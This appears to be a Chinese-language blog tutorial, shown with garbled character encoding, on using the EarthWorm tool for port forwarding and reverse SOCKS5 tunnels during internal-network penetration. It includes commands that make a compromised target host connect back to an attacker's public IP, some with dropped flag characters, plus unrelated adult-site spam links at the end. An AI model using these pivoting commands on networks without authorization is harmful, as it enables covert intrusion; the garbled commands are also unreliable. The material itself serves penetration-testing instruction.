<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          ew端口轉(zhuǎn)發(fā)

          共 1645字,需瀏覽 4分鐘

           ·

          2020-10-23 23:53

          前言


          當(dāng)我們在內(nèi)網(wǎng)滲透中,并拿下了內(nèi)網(wǎng)一臺(tái)服務(wù)器權(quán)限時(shí),自以為內(nèi)網(wǎng)滲透已經(jīng)算一次完整滲透了?


          .....其實(shí)并不是。內(nèi)網(wǎng)漫游的滲透是不完整的


          本文使用的是一款內(nèi)網(wǎng)穿透神器:EarthWorm。




          0x01 ew介紹



          這里EarthWorm簡稱?EW?是一套輕量便攜且功能強(qiáng)大的網(wǎng)絡(luò)穿透工具,基于標(biāo)準(zhǔn)C開發(fā),具有sAocks5代理、端口轉(zhuǎn)發(fā)和端口映射三大功能


          不會(huì)用咋辦?:媽的看官方文檔


          下載地址:https://github.com/idlefire/ew



          1.可穿透復(fù)雜的內(nèi)網(wǎng)環(huán)境。(這么說吧:我本地連著路由器開一個(gè)虛擬機(jī),可以直接反彈到公網(wǎng)的

          云服務(wù)器上。)



          2.以支持多平臺(tái)間的轉(zhuǎn)接通訊,Linux、WindowsMacOS、Arm‐Linux均支持。

          支持平臺(tái)列表:(可跨平臺(tái)反彈)


          ew_for_Win.exe   適用各種Windows系統(tǒng)(X86指令集、X64指令集)   Windows7、Windows  XPew_for_Linux32???各常見Linux發(fā)行版(X86指令集??CPU)?????????Ubuntu(X86)/BT5(X86)ew_for_linux64????各常見Linux發(fā)行版(X64指令集??CPU)????????Ubuntu(X64)/kali(X64)ew_for_MacOSX64????MacOS系統(tǒng)發(fā)行版??(X64指令集)????????????蘋果PC電腦,蘋果serverew_for_Arm32??????常見Arm-Linux系統(tǒng)?????????????????????????HTC??New??One(Arm-Android)/小米路由器(R1Dew_mipsel?????????常見Mips-Linux系統(tǒng)??(Mipipsel指令集?CPU)?螢石硬盤錄像機(jī)、小米mini路由器(R1CM


          幫助文檔:

          nsocks類似通過Socks5代理后的netcat,可用來測試socks    serverssocksd用來開啟Socks5代理服務(wù)ssocks本地啟用Socks5服務(wù),并反彈到另一IP地址rcsocks接收反彈過來的Socks5服務(wù),并轉(zhuǎn)向另一端口‐l  listenport為服務(wù)啟動(dòng)打開一個(gè)端口。‐d  refhost設(shè)置反射主機(jī)地址。‐e  refport設(shè)置反射端口。‐f  connhost設(shè)置連接主機(jī)地址。‐g  connport設(shè)置連接端口。‐h通過添加‐s參數(shù)來顯示幫助文本,您還可以看到更詳細(xì)的幫助。‐a關(guān)于顯示“關(guān)于”頁面‐v版本顯示版本。


          0x02 ?使用方法


          該工具共有 6 種命令格式,幫助文檔寫了常用的3種(ssocksd、rcsocks、rssocks、lcx_slavelcx_listen、lcx_tran



          1、開啟正向SOCKS v5服務(wù)器


          ew_for_Win.exes  ssocksdl 1080




          2、反彈 SOCKS v5 ?服務(wù)器


          操作具體分兩步:

          ?

          a?先在一臺(tái)具有公網(wǎng) ip 的主機(jī)A上運(yùn)行以下命令?假設(shè)這里公網(wǎng)ip為:


          47.104.70.161?

          ew_for_Win.exes  rcsocksl 1080  ‐e  9999


          ?

          b?在目標(biāo)主機(jī)B上啟動(dòng) SOCKS v5 服務(wù) 并反彈到公網(wǎng)主機(jī)的 8888端口


          ew_for_Win.exes  rssocksd 47.104.70.161e  9999



          攻擊機(jī)器會(huì)彈 成功



          此時(shí)一個(gè)Socks5連接工具就可以連接到本地1008端口來代理訪問了,這里我使用Proxifier進(jìn)行代理



          在代理處配置127.0.0.1:1080,測試代理已連接。




          瀏覽 61
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          評(píng)論
          圖片
          表情
          推薦
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  成人做爰黄级A片免费看土方 | 国产偷窥盗摄7777777 | 久久国产乱子伦精品一区二区豆花 | 在线一区视频 | 欧美日韩18禁 |